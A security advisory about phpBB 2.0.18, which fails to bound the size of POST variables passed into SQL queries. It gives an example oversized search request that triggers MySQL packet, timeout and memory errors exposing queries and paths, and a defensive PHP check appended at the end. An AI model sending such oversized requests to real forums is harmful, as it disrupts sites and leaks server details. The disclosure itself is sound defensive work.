phpBB 2.0.18 SQL Query problem

2005.09.30
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

[phpBB 2.0.18 SQL Query problem cXIb8O3.19]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 11.11.2005

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

Contact with author http://www.phpbb.com/about.php.

- --- 1. * SQL query problem ---
phpBB2 doesn't check the size of the SQL query, so we can send any data in all POST variables.

Standard Environment:
post_max_size=8M (standard)
max_allowed_packet < 7M (1M standard in mysql)

Example Environment:
memory_limit>8MB
max_execution_time=30
max_allowed_packet=1M

I have written a simple request where one POST variable sent to the SQL query was 1M.

- ---request---
POST /2018/phpBB2/search.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: strlen(x)

mode=results&search_keywords=CXSecurityComSecurityRea...xMB>max_allowed_packet.(example.1MB.data)...sonCom
- ---/request---

so in output:

- ---output1---
Could not obtain matched posts list

DEBUG MODE

SQL Error : 1153 Got a packet bigger than 'max_allowed_packet'

SELECT m.post_id FROM phpbb_search_wordlist w, phpbb_search_wordmatch m WHERE w.word_text LIKE 'cxsecuritycomcxsecuritycom...' AND m.word_id = w.word_id AND w.word_common <> 1 AND m.title_match = 0

Line : 321
File : search.php
- ---/output1---

sql error.

or when you have:

memory_limit=8MB or max_execution_time<30
display_error=1

You can see in output example:

- ---output2---
Fatal error: Maximum execution time of 15 seconds exceeded in /www/2018/phpBB2/includes/functions_search.php on line 72
- ---/output2---

- ---output3---
Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 1746401 bytes) in /www/2018/phpBB2/includes/functions_search.php on line 27
- ---/output3---

Exploit:
http://cxsecurity.com/achievement_exploitalert/4
(simple errors)

- --- 2.Contact ---
Author: Maksymilian Arciemowicz
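The missing check described in section 1, sketched as an added example (this is not phpBB code and not part of the original advisory): the request field is bounded before any SQL string is built, and the post_max_size / max_allowed_packet mismatch from the "Standard Environment" is tested. The function names, the 255-byte cap and the sample inputs are assumptions made for illustration.

```php
<?php
// Added illustration, not phpBB code. All names and the cap are assumptions.
const MAX_KEYWORD_BYTES = 255; // assumed cap for a search string

// Convert a php.ini size such as "8M" to bytes.
function ini_size_to_bytes(string $value): int
{
    $value = trim($value);
    $bytes = (int) $value;
    switch (strtolower(substr($value, -1))) {
        case 'g': $bytes *= 1024; // fall through
        case 'm': $bytes *= 1024; // fall through
        case 'k': $bytes *= 1024;
    }
    return $bytes;
}

// Return the keywords when within the cap, or null so the caller rejects
// the request before any SQL string is built.
function bounded_search_keywords(array $post): ?string
{
    $raw = $post['search_keywords'] ?? '';
    if (!is_string($raw) || strlen($raw) > MAX_KEYWORD_BYTES) {
        return null;
    }
    return $raw;
}

// True when one POST body can be larger than a single MySQL packet,
// the mismatch behind error 1153 in output1.
function post_can_exceed_packet(string $postMaxSize, int $maxAllowedPacket): bool
{
    return ini_size_to_bytes($postMaxSize) > $maxAllowedPacket;
}

// Constructed inputs mirroring the advisory's environment.
$oversized = ['mode' => 'results', 'search_keywords' => str_repeat('a', 1024 * 1024)];
$normal    = ['mode' => 'results', 'search_keywords' => 'install guide'];

foreach (['oversized' => $oversized, 'normal' => $normal] as $label => $post) {
    $kw = bounded_search_keywords($post);
    echo $label, ': ', $kw === null ? 'rejected' : 'accepted', PHP_EOL;
}
echo 'post_max_size=8M vs max_allowed_packet=1M mismatch: ',
    var_export(post_can_exceed_packet('8M', 1024 * 1024), true), PHP_EOL;
```

Rejecting the oversized field early also avoids the time and memory exhaustion shown in output2 and output3, since the keyword-processing code is never reached. Disabling error display to clients keeps the SQL text and file paths in those outputs out of responses.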

